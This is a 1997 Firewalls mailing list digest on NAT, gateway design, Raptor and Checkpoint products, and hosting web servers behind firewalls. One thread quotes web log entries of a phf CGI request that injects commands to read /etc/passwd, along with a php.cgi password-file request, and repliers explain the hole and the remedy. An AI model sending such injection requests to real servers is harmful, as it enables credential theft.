(SMI-8.6/SMI-SVR4) id LAA00853; Wed, 4 Jun 1997 11:02:49 -0600 Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) id LAA28796; Wed, 4 Jun 1997 11:02:42 -0600 Message-Id: <199706041702.LAA28796@future.mulligan.com> X-Mailer: exmh version 2.0gamma 1/27/96 To: Anton J Aylward cc: "Mark Horn [ Net Ops ]" , Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship In-reply-to: Your message of "Wed, 04 Jun 1997 11:49:24 EDT." <3.0.32.19970604114909.00952700@the-wire.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Jun 1997 11:02:42 -0600 From: Geoff Mulligan Sender: firewalls-owner@GreatCircle.COM Precedence: bulk anton@the-wire.com said: > One public address, and a 10.x.x.x of internal addresses and web > servers. POW! The address space problem just went away. Just get a box that does Network address translation and POW you have a class a on one side and couple of addresses on the other. That's what I have, not that I really need a class a for my dozen or so machines. geoff From owner-firewalls-outgoing Wed Jun 4 12:49:43 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA14549 for firewalls-outgoing; Wed, 4 Jun 1997 10:11:17 -0700 (PDT) Received: from challenger.atc.fhda.edu (challenger.atc.fhda.edu [153.18.200.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA14459 for ; Wed, 4 Jun 1997 10:10:58 -0700 (PDT) Received: from localhost (manek@localhost) by challenger.atc.fhda.edu (8.8.0/8.7.3) with SMTP id KAA03229 for ; Wed, 4 Jun 1997 10:14:45 -0700 (PDT) Date: Wed, 4 Jun 1997 10:14:45 -0700 (PDT) From: "Sameer R. Manek" To: firewalls@greatcircle.com Subject: firewall setup Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The other day someone drew an asci map of how the network should be setup. It looked something like this ---> gateway -+-> firewall ---> internal net | mail server In this setup i don't really seem to understand the purpose of the gateway. here, my intro to tcp/ip protocols book defines a gateway as a device that transplates between protocols. The book suggests it would translate between one network protocol to another, ie tcp/ip -> ipx or appletalk for example. I suppose a gateway could also do NAT and ip mascerading, but assuming you aren't doing any form of nat what is the purpose of a gateway? wouldn't a packet filtering router do a better job with greater security? Also is nat more desirable, from a security stand point? -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Sameer Manek manek@challenger.atc.fhda.edu Commercial Zen:See the dew, do the dew, be the bunny, avoid the Noid. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From owner-firewalls-outgoing Wed Jun 4 14:47:47 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA23901 for firewalls-outgoing; Wed, 4 Jun 1997 13:39:47 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA23746 for ; Wed, 4 Jun 1997 13:39:15 -0700 (PDT) Received: from dns1 (dns1.ci.chi.il.us [199.177.48.3]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id NAA25499 for ; Wed, 4 Jun 1997 13:45:17 -0700 (PDT) Received: by dns1 (SMI-8.6/SMI-SVR4) id PAA29593; Wed, 4 Jun 1997 15:36:09 -0500 From: minaba@dns1.ci.chi.il.us (Mark Inaba) Message-Id: <199706042036.PAA29593@dns1> Subject: audio/video streams To: Firewalls@GreatCircle.COM Date: Wed, 4 Jun 1997 15:36:09 -0500 (CDT) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk does anyone have any horror stories (or just warnings) about letting video/audio streams through a firewall? I don't recall seeing anything recently, but i've been blurring through things. Thanks -Mark From owner-firewalls-outgoing Wed Jun 4 14:54:43 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA22028 for firewalls-outgoing; Wed, 4 Jun 1997 10:49:35 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA21738 for ; Wed, 4 Jun 1997 10:48:26 -0700 (PDT) Received: from baker.vnw.com (baker.vnw.com [192.220.175.88]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id KAA21789 for ; Wed, 4 Jun 1997 10:26:18 -0700 (PDT) Received: by baker.vnw.com with Internet Mail Service (5.0.1457.3) id ; Wed, 4 Jun 1997 10:24:27 -0700 Message-ID: <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com> From: zzIML Firewalls To: "'Firewalls@GreatCircle.COM'" Subject: Do people host WWW servers behind firewalls? Date: Wed, 4 Jun 1997 10:24:29 -0700 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This has been an ongoing planning debate for us... does the potential latency and overhead of a firewall potentially point toward putting high-access high-performance WWW servers on the net without a firewall? Is there a true trade-off of "security vs. performance"? Presume that the WWW servers are at a co-location ISP site and don't have any "critical data" on them. They are mostly publish sites... What is the norm for large sites, say 10MB connected sites or DS3 (45MB) connected sites... Are large public WWW servers typically "behind a firewall" or are they in the clear? Yahoo, Microsoft, Netscape, etc? I mean the large sites... 1,000,000/hits a day sites? What about 10,000,000/hits a day? If there is a discussion in the archives that might be of use, let me know... Thank you, Stephen Gutknecht mailto:StephenG@vnw.com From owner-firewalls-outgoing Wed Jun 4 15:19:56 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA11333 for firewalls-outgoing; Wed, 4 Jun 1997 09:50:24 -0700 (PDT) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA11304 for ; Wed, 4 Jun 1997 09:50:06 -0700 (PDT) Received: by smartwall.v-one.com; id MAA20117; Wed, 4 Jun 1997 12:53:48 -0400 (EDT) Received: from nt-fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma020114; Wed, 4 Jun 97 12:53:37 -0400 Received: by nt-fs1.V-ONE.COM with Internet Mail Service (5.0.1457.3) id ; Wed, 4 Jun 1997 13:01:00 -0400 Message-ID: From: "McMahan, Peg" To: firewalls@GreatCircle.COM Subject: Checkpoint Firewall-1: VPN and Remote Administration Date: Wed, 4 Jun 1997 13:00:59 -0400 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am wondering about the remote management capabilities of the Checkpoint Firewall-1? If an admin is responsible for admining several firewalls in different locations, is remote administration possible? If so, is it relatively simple in setup, and how secure is it? Are the communications strongly authenticated? How about encrypted? Also, with the product SecuRemote, does that software replace the client PC's TCP Stack? Margaret H. McMahan V-ONE Corporation 1803 Research Blvd, Suite 305 Rockville MD, 20850 (301)838-8900 . 224 From owner-firewalls-outgoing Wed Jun 4 15:39:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA00315 for firewalls-outgoing; Wed, 4 Jun 1997 14:09:49 -0700 (PDT) Received: from ibmmail.COM (ibmmail.com [204.146.168.193]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA00215 for ; Wed, 4 Jun 1997 14:09:25 -0700 (PDT) From: uskanbye@ibmmail.com Message-Id: <199706042109.OAA00215@honor.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 4764; Wed, 04 Jun 97 17:13:14 EDT Date: Wed, 04 Jun 1997 17:13:11 EDT To: firewalls@GreatCircle.COM X-Sender-Info: Mitchell Ummel CSP CCP EMAIL:mummel@kdhe.state.ks.us Office of Information Systems, Tech Services Section MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Eagle Raptor NT 4.0 and "Local Tunnel" Config Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anybody out there using the local (null) tunnel feature in the Eagle NT 4.0 firewall? We're attempting to configure this, in conjunction with filters, to pass some protocols that can't be GSP'd (Data Link Switching/DLSw). Any advice/comments/suggestions welcomed. Thanks! --------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT--------- ---------------WWW.STATE.KS.US/PUBLIC/KDHE---------------- --------------Landon State Office Building---------------- ------------------Phone (913) 296-5643-------------------- From owner-firewalls-outgoing Wed Jun 4 15:54:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA29437 for firewalls-outgoing; Wed, 4 Jun 1997 14:05:27 -0700 (PDT) Received: from mail.marben.com (losgatos.sjc.marben.com [206.86.34.51]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA29127 for ; Wed, 4 Jun 1997 14:04:29 -0700 (PDT) Received: (from girsch@localhost) by mail.marben.com (SMI-8.6/SMI-SVR4/MPI-AG(12)) id OAA27744 ; Wed, 4 Jun 1997 14:08:15 -0700 From: girsch@marben.com (Arnaud Girsch) Message-Id: <199706042108.OAA27744@mail.marben.com> Subject: Re: getting passwd file via WWW To: swnuck@unixpros.com (Stan Wnuck) Date: Wed, 4 Jun 1997 14:08:14 -0700 (PDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com> from "Stan Wnuck" at Jun 4, 97 12:04:34 pm X-Organization: Marben Products, Inc. / DSET Corporation X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I have noticed on my WWW log files the following 2 entries. > > some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140 > some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143 > > > Does anyone know anything about these cgi scripts or programs? > Or how dangerous this is? These are well known cgi scripts containing security holes. The phf script coming with the default NCSA server is buggy, and should be disabled. (it allowas execution of shell programs) Arnaud. -- Arnaud Girsch -+- Marben Products, Inc. / DSET Corporation - San Jose, CA agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/ From owner-firewalls-outgoing Wed Jun 4 16:17:32 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA20587 for firewalls-outgoing; Wed, 4 Jun 1997 10:40:37 -0700 (PDT) Received: from greta.teleport.com (sandra.teleport.com [192.108.254.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA20574 for ; Wed, 4 Jun 1997 10:40:24 -0700 (PDT) Received: from linda.teleport.com (linda.teleport.com [192.108.254.12]) by greta.teleport.com (8.8.5/8.7.3) with ESMTP id KAA27110; Wed, 4 Jun 1997 10:44:03 -0700 (PDT) Received: (from alano@localhost) by linda.teleport.com (8.8.5/8.8.4) id KAA19593; Wed, 4 Jun 1997 10:44:03 -0700 (PDT) Date: Wed, 4 Jun 1997 10:44:03 -0700 (PDT) From: Alan To: Stan Wnuck cc: Firewalls@GreatCircle.COM Subject: Re: getting passwd file via WWW In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Jun 1997, Stan Wnuck wrote: > Hi all, > > I have noticed on my WWW log files the following 2 entries. > > some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140 > some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143 > > > Does anyone know anything about these cgi scripts or programs? > Or how dangerous this is? You have just been hacked. Get rid of the phf script. It is has a major security hole. (You may want to upgrade your server to something more recient as well, as there are other holes to worry about.) Change all passwords. They have your password file and are probably running crack on it as you read this. alano@teleport.com | "Those who are without history are doomed to retype it." From owner-firewalls-outgoing Wed Jun 4 16:18:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA28285 for firewalls-outgoing; Wed, 4 Jun 1997 11:21:09 -0700 (PDT) Received: from firewall2.Lehman.COM (firewall.Lehman.COM [192.147.65.67]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA28224 for ; Wed, 4 Jun 1997 11:20:48 -0700 (PDT) From: carson@lehman.com Received: (from smap@localhost) by firewall2.Lehman.COM (8.8.5/8.6.12) id OAA27225; Wed, 4 Jun 1997 14:24:08 -0400 (EDT) Received: from unknown(146.127.39.20) by firewall2 via smap (V1.3) id tmp027213; Wed Jun 4 14:24:05 1997 Received: from kublai.lehman.com by relay.lehman.com (4.1/LB-0.6) id AA27503; Wed, 4 Jun 97 14:24:04 EDT Received: from dragon.lehman.com by kublai.lehman.com (4.1/Lehman Bros. V1.6) id AA17599; Wed, 4 Jun 97 14:24:03 EDT Received: by dragon.lehman.com (SMI-8.6/Lehman Bros. V1.5) id OAA19517; Wed, 4 Jun 1997 14:24:02 -0400 Date: Wed, 4 Jun 1997 14:24:02 -0400 Message-Id: <199706041824.OAA19517@dragon.lehman.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Anton J Aylward Cc: "Mark Horn [ Net Ops ]" , Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship In-Reply-To: <3.0.32.19970604114909.00952700@the-wire.com> References: <3.0.32.19970604114909.00952700@the-wire.com> X-Mailer: VM 6.27 under 20.1 XEmacs Lucid (beta8) Reply-To: carson@lehman.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> "Anton" == Anton J Aylward writes: Anton> Now that's what *I* call a one to many mapping. You come up with a Anton> good way to do this and you'll be famous. Anton> One public address, and a 10.x.x.x of internal addresses and web Anton> servers. POW! The address space problem just went away. It's called NAT (or NAPT) and is part of ip-filter. There are even diffs for making the fwtk app proxies work with it. Next question? -- -- Carson Gaspar -- carson@cs.columbia.edu carson@lehman.com http://www.cs.columbia.edu/~carson/home.html From owner-firewalls-outgoing Wed Jun 4 16:30:51 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA18512 for firewalls-outgoing; Wed, 4 Jun 1997 16:14:33 -0700 (PDT) Received: from grab (grab.coslabs.com [199.233.92.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id QAA18503 for ; Wed, 4 Jun 1997 16:14:27 -0700 (PDT) Received: from future.mulligan.com by grab (SMI-8.6/SMI-SVR4) id RAA02814; Wed, 4 Jun 1997 17:18:14 -0600 Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) id RAA05256; Wed, 4 Jun 1997 17:18:06 -0600 Message-Id: <199706042318.RAA05256@future.mulligan.com> X-Mailer: exmh version 2.0gamma 1/27/96 To: zzIML Firewalls cc: "'Firewalls@GreatCircle.COM'" Subject: Re: Do people host WWW servers behind firewalls? In-reply-to: Your message of "Wed, 04 Jun 1997 10:24:29 PDT." <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Jun 1997 17:18:06 -0600 From: Geoff Mulligan Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am pretty sure that the pathfinder site is behind a firewall. Using something like a stateful packet screen rather than a proxy relay for the firewall will introduce little latency and provide the added protection. geoff From owner-firewalls-outgoing Wed Jun 4 16:52:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA00547 for firewalls-outgoing; Wed, 4 Jun 1997 11:32:37 -0700 (PDT) Received: from alcove.wittsend.com (alcove.wittsend.com [130.205.0.20]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00430 for ; Wed, 4 Jun 1997 11:32:06 -0700 (PDT) Received: from wittsend.com (wittsend.wittsend.com [130.205.0.3]) by alcove.wittsend.com (8.8.4/8.8.4) with SMTP id OAA08723; Wed, 4 Jun 1997 14:36:14 -0400 Received: by wittsend (/\==/\ Smail3.1.28.1 #28.1) for id ; Wed, 4 Jun 97 14:35 EDT Message-Id: Subject: Re: Security Crazy To: wombat@mcfeely.bsfs.org (Rabid Wombat) Date: Wed, 4 Jun 1997 14:35:10 -0400 (EDT) From: "Michael H. Warfield" Cc: jk@stallion.ee, Firewalls@GreatCircle.COM In-Reply-To: from "Rabid Wombat" at Jun 4, 97 11:28:25 am X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rabid Wombat enscribed thusly: > On Sun, 1 Jun 1997, Jyri Kaljundi wrote: > > Sat, 31 May 1997, Marcus J. Ranum wrote: > > >> my CEO has gone security crazy [...] win95 > > > > > > He's a bit unclear on the concept, isn't he? > > > > I am pretty sure there actually are good commercial systems available to > > make large number of win95 machines much more secure than as they are > > out-of-box. > All things are relative ... Really! It would be one hell of a challenge to make it LESS secure. Considering your starting point, you got a lot more room to work with and try to make it more secure. :-) :-) My favorite app for making Windows 95 secure is the Windows NT installation disks! :-) Or Linux, or BSD, or whatever secure operating system will do YOUR job. Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From owner-firewalls-outgoing Wed Jun 4 17:37:35 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA18757 for firewalls-outgoing; Wed, 4 Jun 1997 10:31:37 -0700 (PDT) Received: from cih-gw.cih.com (cih-gw.cih.com [204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA18591 for ; Wed, 4 Jun 1997 10:30:56 -0700 (PDT) Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id NAA04301 for ; Wed, 4 Jun 1997 13:36:29 -0400 X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd04299aaa; Wed Jun 4 17:36:29 1997 Date: Wed, 4 Jun 1997 13:36:29 -0400 (EDT) From: "Craig I. Hagan" Reply-To: hagan@cih.com To: Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship In-Reply-To: <19970604104101.02710@capmark.funb.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > exploit a feature of some operating systems. That feature is that you can > assign many IP addresses to a single ethernet interface. I don't know how > many OS's support this, but I know SunOS doesn't and Solaris does. > [...] > > You want both clients to be able to plug to either server. To accomplish > this, assign two addresses to the firewall on the client side and two > addresses to the firewall on the server side so that you have: heck, why not make it a transparent proxy? i've done that already (ftp.cih.com:~hagan/pub/fix-kits/fwtk/trans.diff.gz [*], NB: old patches). the advantage there is that you don't have to have 8 batrillion entries, permit what you want and let plug-gw figure out the destination host from 'its' ip address as is given by the OS. I'll admit that i've only done this with linux, but, as many have said, solaris and other OSes should work, too. [*] #include #include -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Wed Jun 4 17:54:01 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA02652 for firewalls-outgoing; Wed, 4 Jun 1997 11:44:51 -0700 (PDT) Received: from chaos.coredcs.com (chaos.coredcs.com [198.150.193.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA02629 for ; Wed, 4 Jun 1997 11:44:38 -0700 (PDT) Received: (from jleu@localhost) by chaos.coredcs.com (8.8.5/8.8.5) id NAA29138; Wed, 4 Jun 1997 13:48:23 -0500 From: "James R. Leu" Message-Id: <199706041848.NAA29138@chaos.coredcs.com> Subject: ipfwadm / masquerading question To: klemmerj@webtrek.com Date: Wed, 4 Jun 1997 13:48:23 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Joe Klemmer" at Jun 4, 97 08:09:15 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am setting up a Linux box with a v.35 card and two ethernet cards. The v.35 card is a connection to the net. The ethernet cards are connections to the public and private nets. The private net is being masqueraded, the public net is using real addresses. here is the seup: Real addresses/24 192.168.1.8/30 192.200.9.0/24 .2 .9 .10-------------------.211 | -------------- | |<-- Private Net -> <----------| ISP Router |<----------->| Customer router | -------------- | |<-- Public Net --> -------------------.1 | Real addresses/24 The problem is that IP masquerading translates the from address of packets from the hidden net to the address of the interface it will be leaving on. In this case addresses from 192.200.9.0 will be masqueraded to 192.168.1.10. It there a way to override this default behavior? I would like the from address of packets from the private net to be translated to .1 I realize I could make the v.35 card an un-numbered interface and be done with but I would really like to solve this with ipfwadm. Any ideas? James -- James R. Leu Network Administrator CORE Digital Communication Services jleu@coredcs.com From owner-firewalls-outgoing Wed Jun 4 18:21:58 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA21593 for firewalls-outgoing; Wed, 4 Jun 1997 13:28:32 -0700 (PDT) Received: from compute.com (compute.compute.com [192.215.246.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id NAA21548 for ; Wed, 4 Jun 1997 13:28:20 -0700 (PDT) Received: by compute.com (4.1/SMI-4.1) id AA29192; Wed, 4 Jun 97 13:31:56 PDT Message-Id: <9706042031.AA29192@compute.com> From: rob@compute.com (Robert Roell -Network Intensive) Date: Wed, 4 Jun 1997 13:31:56 -0700 X-Mailer: Mail User's Shell (7.2.3 5/22/91) To: RICK FRATACCIA , firewalls@GreatCircle.COM (IPM Return requested), msquared@hypercon.com (IPM Return requested) Subject: Re: RAPTOR WEBNOT SITE BLOCKING Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At this time, Raptor only supports the WEBNOT facility. rob ] [On Jun 4, RICK FRATACCIA wrote:] ] Subject: Re: RAPTOR WEBNOT SITE BLOCKING ] ] Mike, ] In reference to your comment, Do you know if cybernot will work ] with raptor 4.0 on Solaris? Raptor personnel say that only WebNOT ] works with Raptor. ] ] Rick ] ] ______________________________ Reply Separator _________________________________ ] Subject: RAPTOR WEBNOT SITE BLOCKING ] Author: msquared@hypercon.com at SMTPMAIL ] Date: 6/3/97 7:07 PM ] ] It was written: ] " >From: Allen Rogers ] >Subject: Re: Does Raptor WebNOT Block Legitimate Sites? ] > ] > ] >This is a list that Raptor licenses directly from Microsystems. The ] actual ] >URLs used, and their abbreviated nature, is due to how Microsystems ] chooses ] >to create their list. I am trying to open a formal path where our ] customers ] >can present queries/requests to them directly for particular sites. ] I ] will ] >keep you posted." ] ] ] >CyberPatrol gives two forms at their site for 1) adding a site to ] the list of blocked sites - ] http://www.microsys.com/cybernot/form_add.htm or 2) removing a site from ] the list - http://www.microsys.com/cybernot/form_rev.htm. ] ] I've seen them take action in as little as two hours. They have always ] responded the next business day with a confirming mail note. Mike ]-- End of excerpt from -- ------------------------------------------------------------- N E T W O R K I N T E N S I V E A Member of the Verio Group www.ni.net Robert Roell Senior Internet Systems Engineer rob@compute.com Phone 714-450-8400 ------------------------------------------------------------- From owner-firewalls-outgoing Wed Jun 4 18:24:21 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA04571 for firewalls-outgoing; Wed, 4 Jun 1997 17:31:33 -0700 (PDT) Received: from buffy.isi.net (buffy.isi.net [204.71.194.215]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA04489 for ; Wed, 4 Jun 1997 17:31:15 -0700 (PDT) Received: from localhost (mike@localhost) by buffy.isi.net (8.8.5/ISI-1.5) with SMTP id RAA15747; Wed, 4 Jun 1997 17:35:05 -0700 (PDT) Date: Wed, 4 Jun 1997 17:35:05 -0700 (PDT) From: Mike Hedlund X-Sender: mike@buffy To: zzIML Firewalls cc: "'Firewalls@GreatCircle.COM'" Subject: Re: Do people host WWW servers behind firewalls? In-Reply-To: <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Jun 1997, zzIML Firewalls wrote: > This has been an ongoing planning debate for us... does the potential > latency and overhead of a firewall potentially point toward putting > high-access high-performance WWW servers on the net without a firewall? > Is there a true trade-off of "security vs. performance"? > A firewall doesnt necessarily mean your secure. Carefully securing your machine(s) at a host level is a good way to start. Its amazing how many large sites out there dont do basic audits of their own sites. IE; disabling all nonessential services, etc. The more possible entry points you eliminate for an intruder, the harder it will be for them to get in. And by making it more difficult to get in, hopefully they have to do something which you will notice. > Presume that the WWW servers are at a co-location ISP site and don't > have any "critical data" on them. They are mostly publish sites... > I think for most organizations, who put money into developing a site on the net, be it web/ftp/chat whatever, have a vested interest in keeping it secure. Not because they are worried about people seeing data they shouldnt see, but because of the publicity you will get after being hacked.. i could see it now.. some CEO of a big company turns on CNN to hear a story about how a 12 yearold kid hacked his companys website from school and put up a banner saying 'Im g0d'. It doesnt matter if the kid got anything important. > What is the norm for large sites, say 10MB connected sites or DS3 (45MB) > connected sites... Are large public WWW servers typically "behind a > firewall" or are they in the clear? Yahoo, Microsoft, Netscape, etc? > I mean the large sites... 1,000,000/hits a day sites? What about > 10,000,000/hits a day? > Most sites that large are not connected behind a single large pipe, infact most are distributed up around the net, so it would be possible to firewall their individual smaller sites. Altho not all sites do. -mike From owner-firewalls-outgoing Wed Jun 4 18:45:54 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA27223 for firewalls-outgoing; Wed, 4 Jun 1997 16:59:13 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA25483 for ; Wed, 4 Jun 1997 16:48:53 -0700 (PDT) Received: from live-oak.cycon.com (live-oak.CYCON.COM [198.202.237.69]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id QAA27640 for ; Wed, 4 Jun 1997 16:47:12 -0700 (PDT) Received: from localhost (ardoin@localhost) by live-oak.cycon.com (8.8.5/8.7.3) with SMTP id TAA12380 for ; Wed, 4 Jun 1997 19:45:07 -0400 (EDT) X-Authentication-Warning: live-oak.cycon.com: ardoin owned process doing -bs Date: Wed, 4 Jun 1997 19:45:07 -0400 (EDT) From: Cy Ardoin To: Firewalls@GreatCircle.COM Subject: RE: PIX and FW-1 (packet filter Question) In-Reply-To: <199706041811.LAA27022@honor.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't think there is anything an application firewall can do that can't also be done by a "packet filter" firewall. The new packet filter firewalls are not like the old Cisco/Bay router filters. The new systems operate at the network layer, but they have knowledge of the protocols and applications. They open up the packets and modify the data. These systems are doing content filtering and other "application" types of operations. Yes, not all of them do these things, but many do, and new feature/functions are being added to these systems every year. The key trade-off is performance. Network layer filters want to do everything fast. That's required when you are blocking interupts and other low-level things. So there are somethings done by appliction gateways that these systems are reluctant to do for performance reasons. Nevertheless, the design doesn't prohibit packet filters from performing the functions found in most application gateways. I don't think I would want an application gateway securing a 10Mbit or 100+Mbit pipe to the Internet. On the other side, packet filters can do things that an application gateway can't do; namely, network-network NAT and bi-direction NAT. Application gateway can't do these things because they must rely on the underlying OS to handle the network layer and deliver the packets to the applications. Now before I get flamed, yes, application gateways can do NAT, but only very simple NAT unless you wedge a process into the kernel to intercept packets before they reach the routing decision. But if you do that, you've just turned your application gateway into a packet filter (and you derive all the "bad" features attributed to packet filters). -- Cy Ardoin ardoin@cycon.com -------------------------------------------------------------------- -- Cypress Consulting, Inc. | Voice: 703/383-0247 --- -- 4101 Olympic Way, Alexandria VA | Fax: 703/383-0320 ---- -- and | ---- -- 11240 Waples Mill Road, Suite 403, | http://www.cycon.com/ --- -- Fairfax, VA 22030 | -- -------------------------------------------------------------------- From owner-firewalls-outgoing Wed Jun 4 19:11:36 1997 Received: (majordom@localhost) by 